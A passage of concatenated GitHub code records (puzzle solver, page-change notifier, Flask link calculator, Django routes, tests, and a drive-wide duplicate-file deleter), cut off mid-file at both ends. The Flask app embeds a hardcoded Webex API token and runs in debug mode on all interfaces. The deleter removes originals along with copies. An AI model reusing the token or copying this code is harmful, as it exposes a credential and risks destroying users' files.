chic\r\n\t\tGrain_Left = Grain_present - grain \r\n\r\n\t\tif Farmer_Left != 0:\r\n\t\t\treturn False\r\n\t\tif Chicken_Left == 1 and Grain_Left == 1 and Farmer_Left == 0:\r\n\t\t\treturn False\r\n\t\tif Fox_Left == 1 and Chicken_Left == 1 and Farmer_Left == 0:\r\n\t\t\treturn False\r\n\r\n\t\tFarmer_arrives = p[Farmer][1-side] + farmer\r\n\t\tChicken_arrives = p[Chicken][1-side] + chic\r\n\t\tFox_arrives = p[Fox][1-side]+ fox\r\n\t\tGrain_arrives = p[Grain][1-side] + grain\r\n\t\t\r\n\t\tif Farmer_arrives != 1 : return False\r\n\r\n\t\treturn True\r\n\r\n\tdef move(self, farmer, fox, chic, grain):\r\n\t\tnewState = self.copy()\r\n\t\tside = self.d['boat']\r\n\t\tp = newState.d['people']\r\n\t\tp[Farmer][side] = p[Farmer][side]-farmer\r\n\t\tp[Fox][side] = p[Fox][side]-fox\r\n\t\tp[Chicken][side] = p[Chicken][side]-chic\r\n\t\tp[Grain][side] = p[Grain][side]-grain\r\n\r\n\t\tp[Farmer][1-side] = p[Farmer][1-side]+farmer\r\n\t\tp[Fox][1-side] = p[Fox][1-side]+fox\r\n\t\tp[Chicken][1-side] = p[Chicken][1-side]+chic\r\n\t\tp[Grain][1-side] = p[Grain][1-side]+grain\r\n\t\tnewState.d['boat'] = 1-side\r\n\t\treturn newState\r\n\r\ndef goal_test(s):\r\n p = s.d['people']\r\n return (p[Farmer][RIGHT] == 1 and p[Fox][RIGHT] == 1 and p[Chicken][RIGHT] == 1 and p[Grain][RIGHT] == 1)\r\n\r\ndef goal_message(s):\r\n\treturn \"Congratulations on successfully guiding the Farmer, Fox, Chicken and Grain across the river.\"\r\n\r\nclass Operator:\r\n\tdef __init__(self, name, precond, state_transf):\r\n\t\tself.name = name\r\n\t\tself.precond = precond\r\n\t\tself.state_transf = state_transf\r\n\r\n\tdef is_applicable(self, s):\r\n\t\treturn self.precond(s)\r\n\r\n\tdef apply(self, s):\r\n\t\treturn self.state_transf(s)\r\n\r\n#\r\n#\r\nCREATE_INITIAL_STATE = lambda : State(d={'people':[[1, 0], [1, 0], [1,0], [1,0]], 'boat':LEFT })\r\n#\r\n\r\n#\r\nFfcg_combinations = [(1,0,0,0), (1,1,0,0), (1,0,1,0), (1,0,0,1)]\r\n\r\nOPERATORS = [Operator(\"Cross the river with Farmer \" + \"taking \" + str(f) + \" fox, \" + str(c) + \" chicken, \" + \"and \" + str(g) + \" grain.\",\r\n\t lambda s, F1=Fam, f1=f, c1=c, g1=g: s.can_move(F1, f1, c1, g1),\r\n\t lambda s, F1=Fam, f1=f, c1=c, g1=g: s.move(F1, f1, c1, g1))\r\n \tfor (Fam, f, c, g) in Ffcg_combinations]\r\n #\r\n#\r\nGOAL_TEST = lambda s: goal_test(s)\r\n#\r\n#\r\nGOAL_MESSAGE_FUNCTION = lambda s: goal_message(s)\r\n# \t\r\n\r\n\r\n \t\r\n\r\n","repo_name":"vasumehra/Game-projects","sub_path":"vasum_Farmer_Fox.py","file_name":"vasum_Farmer_Fox.py","file_ext":"py","file_size_in_byte":5578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11172883995","text":"import requests\nimport argparse\nimport time\nimport os\nimport smtplib, ssl\nimport asyncore\nimport smtplib\nimport smtpd\nimport datetime\nimport winsound\n\ndef check_page(webpage, email):\n starttime = time.time()\n initial_contents = requests.get(webpage).content\n while True:\n response = requests.get(webpage)\n contents = response.content\n if response.status_code != 200:\n print(\"I can't get to the page. The webpage appears to be down!\")\n if contents == initial_contents:\n time.sleep(60.0 - ((time.time() - starttime) % 30.0))\n continue\n else:\n print(contents)\n print(\"hmmmm\")\n print(initial_contents)\n make_sound()\n send_email(webpage = webpage , email = email)\n break\n time.sleep(60.0 - ((time.time() - starttime) % 30.0))\n\ndef make_sound():\n frequency = 2500 # Set Frequency To 2500 Hertz\n duration = 2000 # Set Duration To 1000 ms == 2 second\n winsound.Beep(frequency, duration)\n\ndef send_email(webpage ,email):\n fromaddr = \"test@domain.org\"\n toaddrs = [email]\n \n # Add the From: and To: headers at the start!\n msg = \"Hello, it looks like there was a change to the registration page. It may have opened up\"\n \n\n print(\"Message length is\", len(msg))\n with smtplib.SMTP(host = \"localhost\", port = 25) as smtp:\n smtp.sendmail(fromaddr, toaddrs, msg)\n smtp.quit()\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-w', '--webpage',help=\"Webpage to check for every 30 seconds. Ex: https://google.com\", type = str, required = True)\n parser.add_argument('-e', '--email', help=\"Email to send notification to. Be sure to check you spam folder. Ex: abc123@gmail.com\", required = True)\n arguments = parser.parse_args()\n make_sound()\n print(\"Testing sound level. Turn up your volume if you didn't hear anything!\")\n #send_email(arguments.webpage,arguments.email)\n check_page(webpage = arguments.webpage, email = arguments.email)\n\nif __name__ == '__main__':\n main()","repo_name":"aalsabag/registration-notify","sub_path":"check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42737669598","text":"from flask import Flask, render_template, request, redirect\nimport json, os, webexteamssdk\nfrom dotenv import load_dotenv\n\nimport radio1\nimport radio2\n\n# load all environment variables\nload_dotenv()\n\n# Global variables\napp = Flask(__name__)\n\ndef get_json(filename):\n with open(filename ,'r') as f:\n return json.load(f)\n\ndef write_json(data, filename):\n with open(filename ,'w') as f:\n json.dump(data, f, indent=2)\n\n## Routes\n\n#Index\n@app.route('/', methods=[\"GET\",\"POST\"])\ndef index():\n if request.method == \"GET\":\n try:\n # Page without error message and defined header links \n return render_template('settings.html', settings = get_json('settings.json'), devices = get_json('devices.json'), antennas = get_json('antennas.json'), cables = get_json('cables.json'), hiddenLinks=True)\n except Exception as e: \n print(e)\n return render_template('settings.html', settings = get_json('settings.json'), devices = get_json('devices.json'), antennas = get_json('antennas.json'), cables = get_json('cables.json'), hiddenLinks=True)\n else:\n # try:\n freq = request.form.get('frequency')\n\n settings = {\n 'rxdevice' : request.form.get('rxdevice'),\n 'txdevice' : request.form.get('txdevice'),\n 'rxcable' : request.form.get('rxcable'),\n 'rxantenna' : request.form.get('rxantenna'),\n 'txcable' : request.form.get('txcable'),\n 'txantenna' : request.form.get('txantenna'),\n 'frequency' : freq,\n 'desiredrange' : float(request.form.get('range'))/1.609,\n 'desiredrate' : int(request.form.get('datarate')),\n 'domain' : request.form.get('domain'),\n 'bandwidth' : request.form.get('bandwidth'),\n 'channel' : request.form.get('channel'),\n 'height1' : int(request.form.get('height1')),\n 'height2' : int(request.form.get('height2'))\n }\n\n metrics = []\n if freq == \"2.4ghz\":\n metrics = radio1.get_metrics(settings)\n else:\n metrics = radio2.get_metrics(settings)\n\n return render_template('settings.html', settings = get_json('settings.json'), devices = get_json('devices.json'), antennas = get_json('antennas.json'), cables = get_json('cables.json'), hiddenLinks=True, calculated = True, metrics = metrics)\n # except Exception as e: \n # print(e) \n # return render_template('settings.html', settings = get_json('settings.json'), devices = get_json('devices.json'), antennas = get_json('antennas.json'), cables = get_json('cables.json'), hiddenLinks=True, error=True, errormessage=\"Make sure either the range- or rate-field is non-zero.\", errorcode=e)\n\n@app.route('/add-device', methods=[\"GET\",\"POST\"])\ndef add_device():\n if request.method == \"POST\":\n device = {\n \"2.4ghz\": {\n \"spatial-streams\" : int(request.form.get('ss1')),\n \"mcs-limit\" : int(request.form.get('mcs1')),\n \"beamforming\" : int(request.form.get('bf1')),\n \"tx-ss\" : int(request.form.get('txss1')),\n \"rx-ss\" : int(request.form.get('rxss1')),\n \"noise-figure\" : int(request.form.get('nf1')),\n \"builtin-antenna\" : request.form.get('bi1'),\n \"PL\": {\n \"PL1\" : int(request.form.get('pl11')),\n \"PL2\" : int(request.form.get('pl21')),\n }\n },\n \"5ghz\": {\n \"spatial-streams\" : int(request.form.get('ss2')),\n \"mcs-limit\" : int(request.form.get('mcs2')),\n \"beamforming\" : int(request.form.get('bf2')),\n \"tx-ss\" : int(request.form.get('txss2')),\n \"rx-ss\" : int(request.form.get('rxss2')),\n \"noise-figure\" : int(request.form.get('nf2')),\n \"builtin-antenna\" : request.form.get('bi2'),\n \"PL\": {\n \"PL1\" : int(request.form.get('pl12')),\n \"PL2\" : int(request.form.get('pl22')),\n }\n }\n }\n name = request.form.get('model')\n devices = get_json('devices.json')\n devices[name] = device\n write_json(devices, 'devices.json')\n send_files_on_webex()\n return redirect('/p2ptool/')\n\n return render_template('add_device.html', antennas=get_json('antennas.json'))\n\n@app.route('/add-antenna', methods=[\"GET\",\"POST\"])\ndef add_antenna():\n if request.method == \"POST\":\n frequency = request.form.get('frequency')\n gain = int(request.form.get('gain'))\n model = request.form.get('model')\n antennas = get_json('antennas.json')\n antennas[frequency][model] = gain\n write_json(antennas, 'antennas.json')\n send_files_on_webex()\n return redirect('/p2ptool/')\n\n return render_template('add_antenna.html')\n\n@app.route('/add-cable', methods=[\"GET\",\"POST\"])\ndef add_cable():\n if request.method == \"POST\":\n frequency = request.form.get('frequency')\n loss = int(request.form.get('loss'))\n name = request.form.get('name')\n cables = get_json('cables.json')\n cables[frequency][name] = loss\n write_json(cables, 'cables.json')\n send_files_on_webex()\n return redirect('/p2ptool/')\n\n return render_template('add_cable.html')\n\ndef send_files_on_webex():\n token = \"ZTJhNDNjNDktM2E5MC00MWI3LTk2YTktMDFjNTM3ZDY1MWQwMDE1ODI4Y2QtOGU3_PF84_1eb65fdf-9643-417f-9974-ad72cae0e10f\"\n api = webexteamssdk.WebexTeamsAPI(access_token=token)\n api.messages.create(toPersonEmail=\"stienvan@cisco.com\", files=[os.path.abspath(\"antennas.json\")])\n api.messages.create(toPersonEmail=\"stienvan@cisco.com\", files=[os.path.abspath(\"devices.json\")])\n api.messages.create(toPersonEmail=\"stienvan@cisco.com\", files=[os.path.abspath(\"cables.json\")])\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5678, debug=True)","repo_name":"gve-sw/gve_devnet_wireless_link_calculator","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15958469426","text":"from django.urls import path\nfrom .views import formulariop, home, login, formulariop, reuniones, sede, carrera, alumnos, entrevistas, tus_reuniones\n\nurlpatterns = [\n path('', login, name=\"login\"),\n path('home', home, name=\"home\"),\n path('formulariop', formulariop, name=\"formulariop\"),\n path('sede', sede, name=\"sede\"),\n path('carrera', carrera, name=\"carrera\"),\n path('alumnos', alumnos, name=\"alumnos\"),\n path('entrevistas', entrevistas, name=\"entrevistas\"),\n path('reuniones', reuniones, name=\"reuniones\"),\n path('tus_reuniones', tus_reuniones, name=\"tus_reuniones\"),\n]","repo_name":"LucasRC20/academic_advisor","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20351763914","text":"import sys\nimport heapq\ninput = sys.stdin.readline\n\n\ndef coin(k, coinList):\n dp = [0]*(k+1)\n # Basecase\n # 같은 배열을 재활용 하므로 0만 채워주면 된다.\n dp[0] = 1\n\n # 모든 코인의 경우를 다 확인 할때까지 반복\n for i in range(1, n+1):\n # 같은 배열을 재활용 하므로 현재 코인을 사용할 수 있는 경우부터 확인하면 된다.\n for j in range(coinList[i], k+1):\n # 점화식 : dp[i][j] = dp[i-1][j] + dp[i][j-coin[i]]\n # 같은 배열 재활용 하므로 그냥 이전의 배열의 경우를 그대로 더해주면 된다.\n dp[j] = dp[j] + dp[j-coinList[i]]\n\n return dp[k]\n\n\nif __name__ == \"__main__\":\n n, k = map(int, input().strip().split())\n coinList = [0]\n for _ in range(n):\n heapq.heappush(coinList, int(input().strip()))\n\n print(coin(k, coinList))\n","repo_name":"Alphanewbie/TIL","sub_path":"Algorithm_problem_solving/Baek-joon/2293/2293.py","file_name":"2293.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69956095528","text":"import unittest\nfrom urllib import urlopen\n\nimport manuallabour.core.common as common\nfrom manuallabour.core.stores import *\n\nclass TestStores(unittest.TestCase):\n def test_localmemory(self):\n m = LocalMemoryStore()\n\n self.assertFalse(m.has_obj('asdf'))\n m.add_obj(common.Object(obj_id='asdf',name='FooBar'))\n self.assertTrue(m.has_obj('asdf'))\n self.assertEqual(m.get_obj('asdf').name,'FooBar')\n\n self.assertEqual(len(list(m.iter_obj())),1)\n\n m.add_blob('asg','tests/test_stores.py')\n\n def test_blobs(self):\n store = LocalMemoryStore()\n\n self.assertFalse(store.has_blob('afgda'))\n\n store.add_blob('afgda','tests/test_stores.py')\n\n self.assertTrue(store.has_blob('afgda'))\n\n fid = urlopen(store.get_blob_url('afgda'))\n fid.close()\n\n def test_add_objects(self):\n store = LocalMemoryStore()\n\n store.add_obj(common.Object(obj_id='a',name=\"Nut\"))\n store.add_obj(common.Object(obj_id='b',name=\"Wrench\"))\n store.add_obj(common.Object(obj_id='c',name=\"Bolt\"))\n blt = common.Object(obj_id='d',name=\"Tightened NutBolt\")\n store.add_obj(blt)\n\n self.assertTrue(store.has_obj('a'))\n self.assertFalse(store.has_obj('f'))\n self.assertEqual(blt,store.get_obj('d'))\n self.assertEqual(len(list(store.iter_obj())),4)\n\n self.assertRaises(KeyError,\n lambda: store.add_obj(\n (common.Object(obj_id='a',name=\"Smaller Nut\"))\n )\n )\n","repo_name":"jreinhardt/manual-labour","sub_path":"tests/test_stores.py","file_name":"test_stores.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24530864583","text":"# Programa principal, onde as funções criadas como módulo são usadas\r\n\r\nfrom arquiv import *\r\nfrom menu import *\r\n\r\n\r\nlista_principal = [\"Ver pessoas cadastradas\", \"Cadastrar nova Pessoa\", \"Sair do Sistema\"]\r\narquivo = 'desafio115.txt'\r\n\r\nif not arquivo_existe(arquivo):\r\n criar_arquivo(arquivo)\r\n\r\n\r\nwhile True:\r\n resp = layout(lista_principal)\r\n if resp == 1:\r\n ler_arquivo(arquivo)\r\n elif resp == 2:\r\n cabecalho(\"NOVO CADASTRO\")\r\n nome = str(input(\"Nome: \"))\r\n idade = int(input(\"Idade: \"))\r\n cadastro(arquivo, nome, idade)\r\n elif resp == 3:\r\n cabecalho(\"Saindo do sitema\")\r\n break\r\n else:\r\n print('\\033[31mERRO: Digite uma opção válida!\\033[m')\r\n","repo_name":"davi12345452/ExercisesPython","sub_path":"desafio115/sistema.py","file_name":"sistema.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17514569867","text":"class Heuristic3:\n def __init__(self, current, goal):\n self._current = current\n self._goal = goal\n self.heuristic_value = -1\n\n @staticmethod\n def __calc_dist__(p1, p2):\n (x1, y1) = p1\n (x2, y2) = p2\n return abs(x1 - x2) + abs(y1 - y2)\n\n def calc(self):\n if self.heuristic_value < 0:\n self.heuristic_value = 0\n if not hasattr(self._goal, 'dic_goal'):\n self._goal.dic_goal = {}\n\n for i in range(0, self._current.size * self._current.size):\n self._goal.dic_goal[self._goal.get_value(i // 4, i % 4)] = (i // 4, i % 4)\n\n for i in range(0, self._current.size * self._current.size):\n self.heuristic_value += self.__calc_dist__(\n self._goal.dic_goal[self._current.get_value(i // 4, i % 4)],\n (i // 4, i % 4)\n )\n\n return self.heuristic_value\n","repo_name":"EduardoShibukawa/UEM","sub_path":"MOA/Puzzle15/Heuristic/Heuristic3.py","file_name":"Heuristic3.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26629841892","text":"mapping = {\n \"ECG_HR\": \"ecgHr\",\n \"NIBP_Systolic\": \"nibpSystolic\",\n \"NIBP_Diastolic\": \"nibpDiastolic\",\n \"NIBP_Mean\": \"nibpMean\",\n \"SpO2\": \"spo2\",\n \"ET_CO2\": \"etCo2\",\n \"AA_ET\": \"aaEt\",\n \"AA_FI\": \"aaFi\",\n \"AA_MAC_SUM\": \"aaMacSum\",\n \"Agent_AA\": \"agentAa\",\n \"O2_FI\": \"o2Fi\",\n \"N2O_FI\": \"n2OFi\",\n \"N2O_ET\": \"n2OEt\",\n \"CO2_RR\": \"co2Rr\",\n \"T1_Temp\": \"t1Temp\",\n \"T2_Temp\": \"t2Temp\",\n \"P1_HR\": \"p1Hr\",\n \"P1_Systolic\": \"p1Systolic\",\n \"P1_Disatolic\": \"p1Disatolic\",\n \"P1_Mean\": \"p1Mean\",\n \"P2_HR\": \"p2Hr\",\n \"P2_Systolic\": \"p2Systolic\",\n \"P2_Diastolic\": \"p2Diastolic\",\n \"P2_Mean\": \"p2Mean\",\n \"PPeak\": \"ppeak\",\n \"PPlat\": \"pplat\",\n \"TV_Exp\": \"tvExp\",\n \"TV_Insp\": \"tvInsp\",\n \"PEEP\": \"peep\",\n \"MV_Exp\": \"mvExp\",\n \"Compliance\": \"compliance\",\n \"RR\": \"rr\",\n \"ST_II\": \"stIi\",\n \"ST_V5\": \"stV5\",\n \"ST_aVL\": \"stAvl\",\n \"EEG_Entropy\": \"eegEntropy\",\n \"EMG_Entropy\": \"emgEntropy\",\n \"BSR_Entropy\": \"bsrEntropy\",\n \"BIS\": \"bis\",\n \"BIS_BSR\": \"bisBsr\",\n \"BIS_EMG\": \"bisEmg\",\n \"BIS_SQI\": \"bisSqi\",\n}","repo_name":"andybak/VsServer","sub_path":"web/gisdrf/vscapture/mapping.py","file_name":"mapping.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"393865741","text":"'''\n生成图片\n'''\nfrom keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\nimport numpy as np\n\ndatagen = ImageDataGenerator(\n rotation_range=40,\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True,\n fill_mode='nearest')\n\ndatagen = ImageDataGenerator()\n\nimg = load_img('datu-1.jpg') # this is a PIL image\nx = img_to_array(img) # this is a Numpy array with shape (3, 150, 150)\nx = x.reshape((1,) + x.shape) # this is a Numpy array with shape (1, 3, 150, 150)\n\n# the .flow() command below generates batches of randomly transformed images\n# and saves the results to the `preview/` directory\ni = 0\ny = np.array(['1'],dtype='int')\n\n\n#============================================================\n'''\ny = None batch is (1, 340, 260, 3) numpy\ny != None batch[0] is (1, 340, 260, 3) numpy batch[1] (1,)\n'''\nfor batch in datagen.flow(x,y,batch_size=1,\n save_to_dir='test', save_prefix='cat', save_format='jpeg'):\n print(type(batch))\n print(batch[0].shape)\n print(batch[1].shape)\n i += 1\n if i > 1:\n break # otherwise the generator would loop indefinitely\n#============================================================\n\n#============================================================\n# for batch,label in datagen.flow_from_directory('test',target_size=(150, 150),batch_size=1):\n# print(type(batch))\n# print(type(label))\n# i += 1\n# if i > 1:\n# break\n#============================================================","repo_name":"spiolynn/keras_learning_","sub_path":"temp/generater_pic.py","file_name":"generater_pic.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5520136876","text":"\"\"\"Data model for floor\"\"\"\n\nfrom .thing import Thing\n\n\nclass Floor(Thing):\n \"\"\"Floor model class\"\"\"\n\n def __init__(self, name, level, building_id, kind, description=None,\n spatial_info=None, *, id=None):\n super().__init__(id=id)\n self.name = name\n self.kind = kind\n self.level = level\n self.spatial_info = spatial_info\n self.description = description\n self.building_id = building_id\n","repo_name":"HIT2GAP-EU-PROJECT/bemserver","sub_path":"app/bemserver/models/floor.py","file_name":"floor.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"53"} +{"seq_id":"9887217327","text":"from dagster import Definitions, load_assets_from_modules\nfrom dagster_test.toys.partitioned_assets import hourly_and_daily_and_unpartitioned\n\n\ndef test_assets():\n defs = Definitions(assets=load_assets_from_modules([hourly_and_daily_and_unpartitioned]))\n for job_name in defs.get_repository_def().get_implicit_asset_job_names():\n job_def = defs.get_job_def(job_name)\n partition_key = job_def.partitioned_config.partitions_def.get_partition_keys()[0]\n assert job_def.execute_in_process(partition_key=partition_key).success\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster-test/dagster_test_tests/toys_tests/partitioned_assets_tests/test_hourly_and_daily_and_unpartitioned.py","file_name":"test_hourly_and_daily_and_unpartitioned.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"17820183391","text":"from .utils import get_var_function\n\nfrom array import array\n\n# logging\nimport logging\nlogger = logging.getLogger(__name__)\n\n\n#===================================================================================================\ndef get_binning_single_variable(variable, binning_dict, binning_opt=None):\n \"\"\"Retrieve binning for a single variable looking for the binning inside binning_dict\n\n Args:\n variable (str): name of the variable\n\n Returns:\n tuple: tuple containing the number of bins as the first element, and the second and third are\n the variable limits\n \"\"\"\n variable_addon = ''\n\n if 'coarse' == binning_opt:\n variable_addon = '__COARSE'\n\n binning = binning_dict.get(variable+variable_addon, None)\n if binning is None and 'coarse' == binning_opt:\n logger.warning(f'Getting nominal binning for {variable}. COARSE binning not found')\n binning = binning_dict.get(variable, None)\n\n\n if binning is None and '[' in variable and ']' in variable:\n binning = binning_dict.get(variable[:variable.index('[')], None)\n\n if variable is None:\n for var in binning_dict.keys():\n if var in variable:\n binning = binning_dict[var]\n break\n\n if binning is None:\n try:\n binning = binning_dict.get(variable.split('_')[1], None)\n except:\n binning = None\n\n if binning is None:\n try:\n binning = binning_dict.get(variable.split('_')[0], None)\n except:\n binning = None\n\n if binning is None and 'dphi' in variable:\n binning = binning_dict.get('dphi', None)\n \n if binning is None and '/' in variable:\n binning = binning_dict.get(variable.split('/')[0], None)\n \n if binning is None and '*' in variable:\n binning = binning_dict.get(variable.split('/')[0], None)\n\n return binning\n#===================================================================================================\n\n#===================================================================================================\ndef get_binning(variable, binning_dict, binning_opt=None):\n \"\"\"Get the variable for a single variable or a combination of two of them.\n\n Args:\n variable (str): variable or variables, separated by :\n\n Returns:\n tuple: tuple containing the number of bins as the first element, and the second and third are\n the variable limits\n \"\"\"\n # in case the variable contains two variables instead\n if ':' in variable and not '::' in variable:\n varx, vary = variable.split(':')\n\n binning_x = get_binning_single_variable(get_var_function(varx), binning_dict, binning_opt)\n binning_y = get_binning_single_variable(get_var_function(vary), binning_dict, binning_opt)\n\n if len(binning_x) > 3:\n binning_x = array('d', binning_x)\n if len(binning_y) > 3:\n binning_y = array('d', binning_y)\n\n binning = [binning_x, binning_y]\n else:\n binning = get_binning_single_variable(variable, binning_dict, binning_opt)\n\n if binning is None:\n logger.error('Binning is not configured for this variable %s. Using default binning instead.' % variable)\n binning = binning_dict['default']\n\n return binning\n#===================================================================================================\n","repo_name":"franciscosili/utils","sub_path":"binningutils.py","file_name":"binningutils.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25009332091","text":"# 1 - masala.\n# 1. o'quvchilar ro'yhatini e'lon qiling unga oxiriga yangi o'quvchi qo'shing (print qiling) append\n# 2. keyin o'rtasiga yangi o'quvchi qo'shing (print qiling) insert\n# 3. o'quvchilar sonini toping (print qiling) len\n# 4. o'quvchilar ro'yhatiga yana bor ismlardan birini kiriting\n# va shu ismli o'quvchi nechtaligini toping (print qiling) append yoki insert , count\n# 5. yangi o'quvchilar ro'yhatini e'lon qilib eski ro'yhatga ulang\n# va eski ro'yhatni (print qiling) extend\n# 6. ixtiyoriy o'quvchini indeksini topib bering (print qiling) index\n# 7. ro'yhatni tozalang (print qiling) clear\n\n# maxsus masala 1. ro'yhat berilgan. input qilingan yangi o'zgaruvchini input qilingan\n# yangi indeksga insert metodisiz joylashtiring\n# masalan:\n# sonlar = [1, 2, 3, 4] bo'lsin\n# input -> element = 10, index = 2\n# javobi ikkinchi indeksga 10 degan son kiritilsin\n# sonlar = [1, 2, 10, 3, 4]\n\nsonlar = [1, 2, 3, 4, 5, 6]\n\nprint(sonlar)\nfor son in sonlar:\n if son % 2 == 0:\n sonlar[sonlar.index(son)] = son * 2\n elif son % 2 == 1:\n print(sonlar.index(son))\n sonlar[sonlar.index(son)] = son ** 2\n\nprint(sonlar)\n\n# 5 - masala\n# raqamini kiritasiz va shu indeksgacha fibonachi sonlar ro'yhatini tuzasiz\n# fibonachi sonlari -> 1, 1, 2, 3, 5, 8, 13, 21 ...\n\nindeks = int(input(\"=>\"))\n\na = []\n\nfor i in range(indeks + 1):\n if i == 0 or i == 1:\n a.append(1)\n else:\n a.append(a[i - 1] + a[i - 2])\n\nprint(a)\n\n# 6 - masala. ro'yhat berilgan. Har bir elementini o'zidan keyingi elementiga almashtiring.\n# oxirgi elementni nolga tenglang\n\na = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nfor i in range(len(a)):\n if i == len(a) - 1:\n a[i] = 0\n else:\n a[i] = a[i + 1]\nprint(a)\n\n","repo_name":"OybekNarzullaev/Python_darslari2","sub_path":"examp1.py","file_name":"examp1.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"uz","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22461347949","text":"# importing some modules\nimport os\nfrom collections import Counter\nfrom ctypes import *\n\n\n# change directory\ndrive = input(\n \"Enter which drive you want to search :\\n[C, D, E, F or G]\\nDrive: \")\nndrive = drive+\":\\\\\"\nos.chdir(ndrive)\nprint(\"Your'r current directory is\", os.getcwd()) # \"F:\\\\\"\nspecific_folder = input(\"Any specific_folder :\\n\")\nif specific_folder in ['no', \"NO\", \"No\"]:\n drive = ndrive\nelse:\n drive = f\"{drive}:\\{specific_folder}\\\\\"\n\nprint(drive)\n# defining some global variables\nsave = []\ncopyed = []\nremoved_from = []\ncount = 0\ncounter = []\n\n# getting all the files\nfor path, folder, files in os.walk(drive):\n # print(\"current path: \"+ path)\n # spl = path.split('\\\\',',')\n # print('current folders: ' , folder)\n save += files\n\n\n# counting all the duplicate files\n\njack = Counter(save)\n# print(jack.values())\n\n\ndef if_in_dup():\n global jack\n for a, b in jack.items():\n # print(a,b)\n if b == 2:\n copyed.append(a)\n # print(copyed)\n\n# printing coped items\n\n\ndef count_copy():\n global count\n global counter\n global copyed\n if copyed == []:\n print(\"You've no duplicate files in you dirs\")\n else:\n for i in copyed:\n count += 1\n counter.append(f\"{count}.{i}\")\n # print(\"=========================\")\n\n# messagebox.showinfo(\"Information\",\"Informative message\")\n\n\ndef show_copy():\n global count\n global counter\n if windll.user32.MessageBoxW(0, f\"You've {count} copyed files!\", \"Copyed Files\", 1) == 1:\n for i in counter:\n windll.user32.MessageBoxW(0, f\"{i}\", \"Files\", 1)\n else:\n windll.user32.MessageBoxW(0, \"Thank You\", \"Thanks\", 1)\n# final part\n\n\ndef removing():\n global drive\n global copyed\n global removed_from\n permission = input(\n \"If you want to delete those files\\nType 'Yes'\\nelse Type 'No'\\nType Here :\")\n if permission in [\"Yes\", \"yes\", \"YES\"]:\n\n # if_in_dup()\n for path, folder, files in os.walk(drive):\n for i in files:\n if i in copyed:\n removed_from.append(path+'\\\\'+i)\n os.chdir(path)\n os.remove(i)\n copyed.remove(i)\n print(\"Task complete\")\n elif permission in [\"No\", \"no\", \"NO\"]:\n print(\"Thank you. \\nWe didn't remove anything from this path!\")\n else:\n print(\"try again\")\n permission = input(\"Write Yes or No\\n\")\n\n\n'''def duplicate_or_not():\n if copyed == []:\n print(\"You've no duplicate files in you dirs\")\n else:\n print(f\"You have some Duplicate files in this dir--> {copyed}\")\n\nduplicate_or_not()'''\n\n\ndef run():\n if_in_dup()\n count_copy()\n show_copy()\n removing()\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"RomjanHossain/Remove-Copy","sub_path":"remove_COpY.py","file_name":"remove_COpY.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7086308631","text":"# Given an array with n integers, your task is to check if \n# it could become non-decreasing by modifying at most 1 element.\n# We define an array is non-decreasing if array[i] <= array[i + 1] \n# holds for every i (1 <= i < n).\n\n\nclass Solution:\n def checkPossibility(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n index = None\n for i in range(len(nums)-1):\n if nums[i]>nums[i+1]:\n if index is not None: # more than one \n return False\n index = i\n \n return (index is None or index==0 or index ==len(nums)-2 or \n nums[index-1]<=nums[index+1] or nums[index]<=nums[index+2])","repo_name":"Chencx901/leetcode","sub_path":"problems/Non-decreasing-Array.py","file_name":"Non-decreasing-Array.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42673975708","text":"from aiogram import types\nfrom aiogram.utils import executor\nfrom aiogram.types import ParseMode, InlineKeyboardButton, InlineKeyboardMarkup\n\nfrom config import bot, dp\nimport logging\n\n\n@dp.message_handler(commands=['start'])\nasync def command_start(message: types.Message):\n await bot.send_message(message.from_user.id,\n f\"Hello {message.from_user.full_name}\")\n\n\n@dp.message_handler(commands=['quiz'])\nasync def 